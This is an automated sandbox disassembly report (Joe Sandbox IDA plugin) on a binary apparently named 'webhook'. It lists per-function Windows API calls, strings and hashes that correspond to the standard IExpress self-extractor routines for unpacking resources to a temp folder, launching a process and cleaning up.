Function 00007FF650545140 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

FindResourceExA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545168
SizeofResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545179
FindResourceA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF65054519F
LoadResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451B0
LockResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451BF
memcpy_s.MSVCRT ref: 00007FF6505451DE
FreeResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451ED

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID:
API String ID: 3370778649-0
Opcode ID: 2510229bffcfcd21528b24f34bd27410616bb77d7ecccc953f1e7a4fd532fcaf
Instruction ID: df64630fd4401d84def8e674349c1beacaa992a48bfa27237d8fbcad2fe8d8c6
Opcode Fuzzy Hash: 2510229bffcfcd21528b24f34bd27410616bb77d7ecccc953f1e7a4fd532fcaf
Instruction Fuzzy Hash: 53113D35708B42A7E7145B62A6051BDBAA0FB4EFC1F489438ED8EA3755DF3CD4558700

Function 00007FF6505443CC Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97
registryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNELBASE ref: 00007FF650544411
DeleteFileA.KERNELBASE ref: 00007FF650544420
LocalFree.KERNEL32 ref: 00007FF650544433
LocalFree.KERNEL32 ref: 00007FF650544442
SetCurrentDirectoryA.KERNELBASE ref: 00007FF6505444DB
RegOpenKeyExA.KERNELBASE ref: 00007FF65054452E
RegDeleteValueA.KERNELBASE ref: 00007FF65054454A
RegCloseKey.ADVAPI32 ref: 00007FF65054455B

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00007FF650544520
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF65054447C
wextract_cleanup0, xrefs: 00007FF650544543

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
API String ID: 3049360512-3137473940
Opcode ID: 945d950d7bb6d2b03bb19646d956afc38b938c28c29c6955e31643fe977d61b4
Instruction ID: 715da5ccd86ddcc2f03b19318cf84e2c9f781ff3f72d7603c7d7abde61301934
Opcode Fuzzy Hash: 945d950d7bb6d2b03bb19646d956afc38b938c28c29c6955e31643fe977d61b4
Instruction Fuzzy Hash: EA512B31A08A83B6EB518B14EA443F97BA0FB85B45F8C5131CA8D97795DF3CE464CB00

Function 00007FF650547010 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE ref: 00007FF650547091
WaitForSingleObject.KERNEL32 ref: 00007FF6505470AD
GetExitCodeProcess.KERNELBASE ref: 00007FF6505470C3
CloseHandle.KERNEL32 ref: 00007FF65054714F
CloseHandle.KERNEL32 ref: 00007FF650547160

Strings

, xrefs: 00007FF65054707F

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWait
String ID:
API String ID: 976364251-3916222277
Opcode ID: 19170bdb0185dcc4558629786d1e3b276faf8172c778104cd8efa3f0263b16b4
Instruction ID: 476ac9c9fe8169ffb5d8e20846b8dd868734b10b8cd712db0958b6ca9238c282
Opcode Fuzzy Hash: 19170bdb0185dcc4558629786d1e3b276faf8172c778104cd8efa3f0263b16b4
Instruction Fuzzy Hash: C5518D32908A87B6E7608F20EA553FAB7A0FB89754F485135EA8D96794CF7CD464CB00

Function 00007FF650544FD8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RemoveDirectoryA.KERNELBASE(0000000A,00007FF65054807B), ref: 00007FF650545074
GetFileAttributesA.KERNELBASE ref: 00007FF650545083
GetTempFileNameA.KERNEL32 ref: 00007FF6505450B0
DeleteFileA.KERNEL32 ref: 00007FF6505450C8
CreateDirectoryA.KERNEL32 ref: 00007FF6505450D9

Strings

IXP%03d.TMP, xrefs: 00007FF650545012
IXP, xrefs: 00007FF6505450A3

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: File$Directory$AttributesCreateDeleteNameRemoveTemp
String ID: IXP$IXP%03d.TMP
API String ID: 4001122843-3932986939
Opcode ID: 950e06c3cc114e96d21c71c189c663bea0479e63569984cfb08e3cb431742b4e
Instruction ID: 15f564550317ed66d351c919540bd836277818173a9b3a0b27b7e10f13f79e7f
Opcode Fuzzy Hash: 950e06c3cc114e96d21c71c189c663bea0479e63569984cfb08e3cb431742b4e
Instruction Fuzzy Hash: 7C319236B18A42B6EB108F16A9043F97BA1FB8DB80F5D9131CD8E93391CE7DD455C640

Function 00007FF650541150 Relevance: 12.1, APIs: 8, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6505418E4: GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF650541914
Part of subcall function 00007FF6505418E4: GetCurrentProcessId.KERNEL32 ref: 00007FF650541922
Part of subcall function 00007FF6505418E4: GetCurrentThreadId.KERNEL32 ref: 00007FF65054192E
Part of subcall function 00007FF6505418E4: GetTickCount.KERNEL32 ref: 00007FF65054193A
Part of subcall function 00007FF6505418E4: GetTickCount.KERNEL32 ref: 00007FF65054194A
Part of subcall function 00007FF6505418E4: QueryPerformanceCounter.KERNEL32 ref: 00007FF650541965

GetStartupInfoW.KERNEL32 ref: 00007FF650541185
_amsg_exit.MSVCRT ref: 00007FF6505411C0
Sleep.KERNEL32 ref: 00007FF6505411CF
_initterm.MSVCRT ref: 00007FF650541267
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF650541294
exit.MSVCRT ref: 00007FF650541330
_cexit.MSVCRT ref: 00007FF65054133F
_ismbblead.MSVCRT ref: 00007FF65054135F

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
String ID:
API String ID: 2995914023-0
Opcode ID: dc0a5e20638ea67c63c6f64c653ebcfbc2cd40491069adb64e4f082b60295cf1
Instruction ID: 0a513435678af37dbae0cb7f7c1265deea23235336759af2aebc817053acecbf
Opcode Fuzzy Hash: dc0a5e20638ea67c63c6f64c653ebcfbc2cd40491069adb64e4f082b60295cf1
Instruction Fuzzy Hash: A2613535A0CA43B6E7608B21EA553F936A0FB84794F5C0035DACDE27A4DF7CE861C608

Function 00007FF6505456C8 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF650545140: FindResourceExA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545168
Part of subcall function 00007FF650545140: SizeofResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545179
Part of subcall function 00007FF650545140: FindResourceA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF65054519F
Part of subcall function 00007FF650545140: LoadResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451B0
Part of subcall function 00007FF650545140: LockResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451BF
Part of subcall function 00007FF650545140: memcpy_s.MSVCRT ref: 00007FF6505451DE
Part of subcall function 00007FF650545140: FreeResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451ED

LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF65054471F), ref: 00007FF6505456ED
LocalFree.KERNEL32 ref: 00007FF650545766

Part of subcall function 00007FF6505461E8: LoadStringA.USER32 ref: 00007FF650546278
Part of subcall function 00007FF6505461E8: MessageBoxA.USER32 ref: 00007FF6505462B8

Part of subcall function 00007FF650546590: GetLastError.KERNEL32 ref: 00007FF650546594

Strings

<None>, xrefs: 00007FF65054577E
UPROMPT, xrefs: 00007FF6505456D5, 00007FF650545732
, xrefs: 00007FF6505457BC

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: $<None>$UPROMPT
API String ID: 957408736-2569542085
Opcode ID: cc3629978ed69afb5803e0dd2a9524f4ca17eb0d68234ca8f1da61ca061089fe
Instruction ID: e9a94718cf10febad225fa12552f8d19adf78a7dbe327ec039f011bddf485b5d
Opcode Fuzzy Hash: cc3629978ed69afb5803e0dd2a9524f4ca17eb0d68234ca8f1da61ca061089fe
Instruction Fuzzy Hash: 3531B031A0C643F7F7209B20E7513FA7A50EB89784F485135DA8E96B96DFBCE0248B00

Function 00007FF650548400 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 164filestringCOMMON

Download Yara Rule

APIs

lstrcmpA.KERNEL32 ref: 00007FF650548487
CreateFileA.KERNELBASE ref: 00007FF650548545
CreateFileA.KERNEL32 ref: 00007FF6505485FE

Strings

*MEMCAB, xrefs: 00007FF65054847D

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: CreateFile$lstrcmp
String ID: *MEMCAB
API String ID: 1301100335-3211172518
Opcode ID: 882ecc141dfa2a6022f31e20c1b0ac6f4acce46d394e68a6a22d01aa207dc993
Instruction ID: c140bab6c9dcea777404f4edc3395c08592b1f841395596ca88b0d9e421cc473
Opcode Fuzzy Hash: 882ecc141dfa2a6022f31e20c1b0ac6f4acce46d394e68a6a22d01aa207dc993
Instruction Fuzzy Hash: FC619472A08743B6F7608F15A6803FD7A91E755BA4F485335CAAE627C0CF7CE4658A00

Function 00007FF6505481D1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32 ref: 00007FF650548280
LocalFileTimeToFileTime.KERNEL32 ref: 00007FF65054829A
SetFileTime.KERNELBASE ref: 00007FF6505482C2
SetFileAttributesA.KERNELBASE ref: 00007FF6505482F8
SetDlgItemTextA.USER32 ref: 00007FF65054832B

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF650548247, 00007FF65054833B

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: FileTime$AttributesDateItemLocalText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 851750970-305352358
Opcode ID: 1b29dbb9e3ca8058bb845d1cdcb3f6214ba747c613cdf2411ff3bfa011323251
Instruction ID: d53a50527a7b6448edfeb3ed6be2a65ae0a03401d0dc6e28ff8d5e42421ee280
Opcode Fuzzy Hash: 1b29dbb9e3ca8058bb845d1cdcb3f6214ba747c613cdf2411ff3bfa011323251
Instruction Fuzzy Hash: 65516B32A1C943B1EA609F25DA041FE67A0FB84B94F584232DACDA37D4DF2CE465C740

Function 00007FF650545ED8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FF650545F08

Strings

TMP4351$.TMP, xrefs: 00007FF650545FA5

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: AllocLocal
String ID: TMP4351$.TMP
API String ID: 3494564517-2619824408
Opcode ID: f6643adad851909dc84ab3123c3a019038264e65fc77465c454a882d24c4d207
Instruction ID: 3fa87ba6d011d91ebc10c7a6ec70cfd3682fa3e63cddd96e1a73cc93ef84c242
Opcode Fuzzy Hash: f6643adad851909dc84ab3123c3a019038264e65fc77465c454a882d24c4d207
Instruction Fuzzy Hash: E531B271A18A83B6FB104B25A6003F97A90EB85BA4F5C4334DAAD937D5CF7CD4198701

Function 00007FF650544598 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 71memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF650545140: FindResourceExA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545168
Part of subcall function 00007FF650545140: SizeofResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545179
Part of subcall function 00007FF650545140: FindResourceA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF65054519F
Part of subcall function 00007FF650545140: LoadResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451B0
Part of subcall function 00007FF650545140: LockResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451BF
Part of subcall function 00007FF650545140: memcpy_s.MSVCRT ref: 00007FF6505451DE
Part of subcall function 00007FF650545140: FreeResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451ED

LocalAlloc.KERNEL32(?,?,?,?,?,00007FF650544735), ref: 00007FF6505445B9
LocalFree.KERNEL32 ref: 00007FF65054463C

Part of subcall function 00007FF6505461E8: LoadStringA.USER32 ref: 00007FF650546278
Part of subcall function 00007FF6505461E8: MessageBoxA.USER32 ref: 00007FF6505462B8

Part of subcall function 00007FF650546590: GetLastError.KERNEL32 ref: 00007FF650546594

lstrcmpA.KERNEL32(?,?,?,?,?,00007FF650544735), ref: 00007FF650544662
LocalFree.KERNEL32(?,?,?,?,?,00007FF650544735), ref: 00007FF6505446C3

Part of subcall function 00007FF6505464B0: FindResourceA.KERNEL32 ref: 00007FF6505464DA
Part of subcall function 00007FF6505464B0: LoadResource.KERNEL32 ref: 00007FF6505464F1
Part of subcall function 00007FF6505464B0: DialogBoxIndirectParamA.USER32 ref: 00007FF650546527
Part of subcall function 00007FF6505464B0: FreeResource.KERNEL32 ref: 00007FF650546539

LocalFree.KERNEL32 ref: 00007FF65054469C

Strings

<None>, xrefs: 00007FF65054465B
LICENSE, xrefs: 00007FF6505445A1, 00007FF650544604

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 4caabee9ee0ad8c32e7f245cf07f671de7ab33bfc02977cd0a3ed29220ffecaf
Instruction ID: 1a5acc834d795d9bc790fe0405b6d9391275f4234594914cd6c4d74e34442221
Opcode Fuzzy Hash: 4caabee9ee0ad8c32e7f245cf07f671de7ab33bfc02977cd0a3ed29220ffecaf
Instruction Fuzzy Hash: 24317C31A19A03B3F7209F20E6153F97660FB85745F485134C98EE6795EF7CE0248B00

Function 00007FF6505434D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(?,?,?,?,00000000,00007FF650542566), ref: 00007FF650543527
RegQueryValueExA.KERNELBASE(?,?,?,?,00000000,00007FF650542566), ref: 00007FF650543558
RegCloseKey.KERNELBASE(?,?,?,?,00000000,00007FF650542566), ref: 00007FF650543576

Strings

System\CurrentControlSet\Control\Session Manager, xrefs: 00007FF650543519
PendingFileRenameOperations, xrefs: 00007FF650543546

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager
API String ID: 3677997916-3057196482
Opcode ID: 340b8b646548313282c693838e7f25eceb0ba4f0296da7f4314fc4dbeecda6e5
Instruction ID: 37881dcb2cb9102ad93379fb43532e1c8583580e6dd8fa6565f1fda77a202ca9
Opcode Fuzzy Hash: 340b8b646548313282c693838e7f25eceb0ba4f0296da7f4314fc4dbeecda6e5
Instruction Fuzzy Hash: AA117F32A08643B7E7208B19E5441B9BBA1FB8A350F584135DBCD92B68DF3DD828CA00

Function 00007FF6505487A0 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF650547F58: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF650544A99), ref: 00007FF650547F7C
Part of subcall function 00007FF650547F58: PeekMessageA.USER32 ref: 00007FF650547FC2

WriteFile.KERNELBASE ref: 00007FF6505487F4

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: FileMessageMultipleObjectsPeekWaitWrite
String ID:
API String ID: 3430465807-0
Opcode ID: 991d4bdccbb001d71ab861eb250e50ad34ff21f81909168724640f7d797acd5b
Instruction ID: 3bc722409aa00ad78f1a9123598fb29cd57acbb7f5f16d840b958f20e80554dd
Opcode Fuzzy Hash: 991d4bdccbb001d71ab861eb250e50ad34ff21f81909168724640f7d797acd5b
Instruction Fuzzy Hash: 0C218030A08643B6E7108F16E6443B9B7A0FB94B94F588234D99DA77A4CF3DD425CB00

Function 00007FF650544140 Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE ref: 00007FF650544152
SetFileAttributesA.KERNEL32 ref: 00007FF6505441C7

Part of subcall function 00007FF6505464B0: FindResourceA.KERNEL32 ref: 00007FF6505464DA
Part of subcall function 00007FF6505464B0: LoadResource.KERNEL32 ref: 00007FF6505464F1
Part of subcall function 00007FF6505464B0: DialogBoxIndirectParamA.USER32 ref: 00007FF650546527
Part of subcall function 00007FF6505464B0: FreeResource.KERNEL32 ref: 00007FF650546539

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 2018477427-0
Opcode ID: 4737db5ac4d1f4b61336884d07e3be5c2f7f4e323d7d01ce83fef1e9a7c030ba
Instruction ID: 534daef40cf95729eff845af909d04184a0d750a6636c4dafa81ccd51e42df1d
Opcode Fuzzy Hash: 4737db5ac4d1f4b61336884d07e3be5c2f7f4e323d7d01ce83fef1e9a7c030ba
Instruction Fuzzy Hash: E9117C31A4CA87B6FB514F10A6483F56690AF95758F1C5131CDCCA2794DF3CE8A5CA40

Function 00007FF65054887C Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CharPrevA.USER32 ref: 00007FF6505488C3

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 8245624d2b9ebc6079e72f8030c20bb1c2af5584c94ac8071bf526b29981342a
Instruction ID: ed8aad8f13eb5d66ab1cf2dfd3d648000d0016aa3ddd548d9b2ed029dfe1f59d
Opcode Fuzzy Hash: 8245624d2b9ebc6079e72f8030c20bb1c2af5584c94ac8071bf526b29981342a
Instruction Fuzzy Hash: 3B01DB11D0C7C6F6F3104B15A5403BD7A91A745BA0F9C9230DBA9677D5CF2CD4528704

Function 00007FF650548160 Relevance: 1.3, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00007FF650548199

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 631afb329a542f924e594eb567a6f67e576df5b656a914a684b149cc5fb41dd4
Instruction ID: 66192c20b23eef4706776b2cb03a3e7cd43244d779157d274b8961d008a37c11
Opcode Fuzzy Hash: 631afb329a542f924e594eb567a6f67e576df5b656a914a684b149cc5fb41dd4
Instruction Fuzzy Hash: 90F01D31608682B2EB584F25F6851BC76A0EB48B58F189236DA6B97784CF78D495C710

Non-executed Functions

Function 00007FF6505478AE Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 177windowCOMMON

Download Yara Rule

APIs

LoadStringA.USER32 ref: 00007FF65054792A
EndDialog.USER32 ref: 00007FF650547AD2
GetDesktopWindow.USER32 ref: 00007FF650547B02
SetWindowTextA.USER32 ref: 00007FF650547B23
SendDlgItemMessageA.USER32 ref: 00007FF650547B47
GetDlgItem.USER32 ref: 00007FF650547B64
EnableWindow.USER32 ref: 00007FF650547B75
EndDialog.USER32 ref: 00007FF650547B88

Strings

, xrefs: 00007FF650547A36
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6505479B5

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
